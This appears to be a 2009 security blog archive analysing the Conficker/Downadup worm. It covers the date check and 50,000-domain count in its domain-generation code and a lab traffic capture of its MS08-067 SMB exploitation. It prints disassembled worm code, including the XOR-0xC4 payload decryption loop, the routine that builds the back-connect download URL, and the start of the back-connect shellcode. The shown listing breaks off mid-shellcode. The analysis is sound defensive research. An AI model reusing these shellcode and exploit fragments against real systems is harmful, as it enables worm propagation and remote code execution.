you can find at :
http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker/
Archive for conficker
Conficker domain generation algorithm and disinfection
Posted in Uncategorized with tags algorithm, conficker, domains, Downadup, kido on April 1, 2009 by ianstarkc50000 Domains per day —>>Updated Downadup/Conficker/kido
Posted in Uncategorized with tags Analysis, Analysis Malware, Analysis Malware.Virus, conficker, Domain List, new downadup, Virus on March 8, 2009 by ianstarkcThere is some news about new variant of downadup worm . In old variant it was generating 250 domains per day but in this variant it changed its algorithm and now it is calculating 50000 domains per day !!! . I confirmed this through the code of new variant . See hint :
66 81 7D 80 D9 07 cmp word ptr [ebp-80h], 7D9h ——>>Checking for Year 0x7D9 ==2009
77 12 ja short loc_6A3C37
75 26 jnz short loc_6A3C4D
66 83 7D 82 04 cmp word ptr [ebp-7Eh], 4 ———->> For Month 4 == ‘April’
77 09 ja short loc_6A3C37
75 1D jnz short loc_6A3C4D
66 83 7D 86 01 cmp word ptr [ebp-7Ah], 1 ———–>>For Date == 1 SO ( 01-04-2009)
72 16 jb short loc_6A3C4D
83 7D 90 00 cmp dword ptr [ebp-70h], 0
74 09 jz short loc_6A3C46
short loc_6A3C46:
E8 2F 49 00 00 call sub_6A857A
sub_6A857A:
68 94 08 00 00 push 894h
68 00 00 25 20 push 20250000h
—————
89 BD 60 FF FF FF mov [ebp-0A0h], edi
81 FF 50 C3 00 00 cmp edi, 0C350h ———->>Domain Count 0xC350 == 50,000
0F 83 B9 00 00 00 jnb loc_6A86B0
6A 20 push 20h
6A 40 push 40h
8B 8D 5C FF FF FF mov ecx, [ebp-0A4h]
8D 1C B9 lea ebx, [ecx+edi*4]
89 03 mov [ebx], eax
85 C0 test eax, eax
0F 84 4E 02 00 00 jz loc_6A8862
E8 90 FE FF FF call sub_6A84A9
50 push eax
I hope , i’ll post full algorithm/standalone compiled file. I also want to find out why this time it is having so much website strings like… See file strings here.
rapidshare.com, imageshack.us, facebook.com, w3.org, ask.com , yahoo.com , google.com , baidu.com,
xiaonei.com , studiverzeichnis.com, alice.it , msn.com , ebay.com , zedo.com , tuenti.com, metroflog.com , conduit.com , ameba.jp , ning.com , imdb.com, Todnoklassniki.ru , fc2.com , mediafire.com , mapquest.com , sourceforge.net, google.com, ucoz.ru , xhamster.com, pcpop.com, ameblo.jp , tinypic.com, livejasmin.com
tianya.cn, gougou.com, reference.com, wikimedia.org,ebay.co.uk, pornhub.com, imeem.com ,adultadworld.com
yahoo.com, naver.com , kooora.com, biglobe.ne.jp, soso.com , answers.com ,mail.ru,xvideos.com,
foxnews.com, espn.go.com, thepiratebay.org, aweber.com , geocities.com , megaporn.com , facebook.com, youtube.com, pogo.com, 4shared.com, linkedin.com , lickr.com, wordpress.com, dell.com, aim.com, adobe.com, verizon.net, disney.go.com, apple.com , adultfriendfinder.com, nba.com, ..much more
-Avii
Downadup/Conficker/Kido Infection-traffic analysis
Posted in Uncategorized with tags Analysis, conficker, Domain List, Downadup, kido on February 1, 2009 by ianstarkcWhile analyzing the variant of Downadup/Conficker/Kido , I setup my analysis lab to know how exactly it attacks on other machines in LAN. So , I infected test machine “IP 192.168.1.7” and then run the sniffer like wireshark. As you can see in following image on successful connection to port 445 (SMB)of 192.168.1.6 , it is trying to send “NetPathCanonicalize” request by SRVSVC service ( Ms08-067 Vulnerabilty) See packet 113.
I found, after infecting the machine, it creates local http server (random port) to distribute the malware .To infect other machine, it’ll send the same URL to victims. But you cann’t see that request in packets “Path Query” in “Netpathcanonicalize request” as it is encrypted!!! How do i came to know ..
Answer—>>There is decyption routine in this packet itself .. see below this is data of packet 113.
It decodes to:
shortloc_8899FA 8031C4 xor byte ptr [ecx], 0C4h
seg000:008899FD 41 inc ecx
seg000:008899FE 6681394D53 cmp word ptr [ecx], 534Dh
seg000:00889A03 75F5 jnz short loc_8899FA
It means the payload is encrypted with”XOR 0xC4″ . This code decrypts the data by XORing with 0xC4 until word 0x534D comes. So, here it is :
Here you can see clearly , this is back-connect shellcode . So its infection method is;
1. It’ll exploit the vulnerabilty.
2. Successful exploitation results execution of payload.
3. Payload tells other machine to connect “already infected” machine in this form
“http://%5BinfectedPC ip]:port/[random]” . Here in my case it is “http://192.168.1.7:6216/ewflztq”
Infected machine had already opened the random port 6216 to spread malware. the string “ewflztq” is randomly generated for a particular session. From that location it downloads the copy of malware and do execution.
The same thing I verified in the code of malware specimen . see below
seg000:0087966F 50 push eax ; _DWORD
seg000:00879670 68 B4 3F 87 00 push offset aHttpD_D_D_DDS ; “http://%d.%d.%d.%d:%d/%s”
seg000:00879675 8D 45 80 lea eax, [ebp+var_80]
seg000:00879678 68 80 00 00 00 push 80h ; _DWORD
seg000:0087967D 50 push eax ; _DWORD
seg000:0087967E FF 15 B8 12 87 00 call ds:MSVCRT_snprintf
seg000:00879684 8D 45 80 lea eax, [ebp+var_80]
seg000:00879687 50 push eax
seg000:00879688 C6 45 FF 00 mov [ebp+var_1], 0
seg000:0087968C E8 2F D9 00 00 call j_MSVCRT_strlen
seg000:00879691 83 C4 28 add esp, 28h
seg000:00879694 05 BE 00 00 00 add eax, 0BEh
seg000:00879699 50 push eax
seg000:0087969A 6A 40 push 40h
seg000:0087969C FF 15 C4 10 87 00 call ds:GlobalAlloc
seg000:008796A2 85 C0 test eax, eax
seg000:008796A4 8B 75 08 mov esi, [ebp+arg_0]
seg000:008796A7 89 06 mov [esi], eax
seg000:008796A9 0F 84 84 00 00 00 jz loc_879733
seg000:008796AF 53 push ebx
seg000:008796B0 57 push edi
seg000:008796B1 BF B9 00 00 00 mov edi, 0B9h
seg000:008796B6 57 push edi
seg000:008796B7 68 F0 99 88 00 push offset Exploit_PayLoad_BackConnect
seg000:008796BC 50 push eax
seg000:008796BD E8 10 D9 00 00 call j_MSVCRT_memcpy
Encryption Loop
seg000:008796F5 Do_Crypt_Payload: ;
seg000:008796F5 8B 06 mov eax, [esi]
seg000:008796F7 03 C7 add eax, edi
seg000:008796F9 80 30 C4 xor byte ptr [eax], 0C4h
seg000:008796FC 8D 45 80 lea eax, [ebp+var_80]
seg000:008796FF 50 push eax
seg000:00879700 47 inc edi
seg000:00879701 E8 BA D8 00 00 call j_MSVCRT_strlen
seg000:00879706 03 C3 add eax, ebx
seg000:00879708 3B F8 cmp edi, eax
seg000:0087970A 59 pop ecx
seg000:0087970B 72 E8 jb short Do_Crypt_Payload
seg000:0087970D
seg000:0087970D loc_87970D:
seg000:0087970D 8B 06 mov eax, [esi]
seg000:0087970F C6 04 07 4D mov byte ptr [edi+eax], 4Dh
seg000:00879713 8B 06 mov eax, [esi]
seg000:00879715 C6 44 38 01 53 mov byte ptr [eax+edi+1], 53h
seg000:0087971A 8B 06 mov eax, [esi]
seg000:0087971C C6 44 38 02 00mov byte ptr [eax+edi+2], 0
And the Payload is :
Exploit_PayLoad_BackConnect: ;
seg000:008899F0
seg000:008899F0 E8 FF FF FF FF call near ptr Exploit_PayLoad_BackConnect+4
seg000:008899F0 ; —————————————————————————
seg000:008899F5 C2 db 0C2h ; –
seg000:008899F6 ; —————————————————————————
seg000:008899F6 5F pop edi
seg000:008899F7 8D 4F 10 lea ecx, [edi+10h]
seg000:008899FA
seg000:008899FA loc_8899FA:
seg000:008899FA 80 31 C4 xor byte ptr [ecx], 0C4h
seg000:008899FD 41 inc ecx
seg000:008899FE 66 81 39 4D 53 cmp word ptr [ecx], 534Dh
seg000:00889A03 75 F5 jnz short loc_8899FA
seg000:00889A05 FC cld
seg000:00889A06 6A 02 push 2
seg000:00889A08 59 pop ecx
seg000:00889A09 64 8B 41 2E mov eax, fs:[ecx+2Eh]
seg000:00889A0D 8B 40 0C mov eax, [eax+0Ch]
seg000:00889A10 8B 40 1C mov eax, [eax+1Ch]
seg000:00889A13 8B 00 mov eax, [eax]
seg000:00889A15 8B 58 08 mov ebx, [eax+8]
seg000:00889A18 8D B7 A1 00 00 00 lea esi, [edi+0A1h]
K\'LL3r 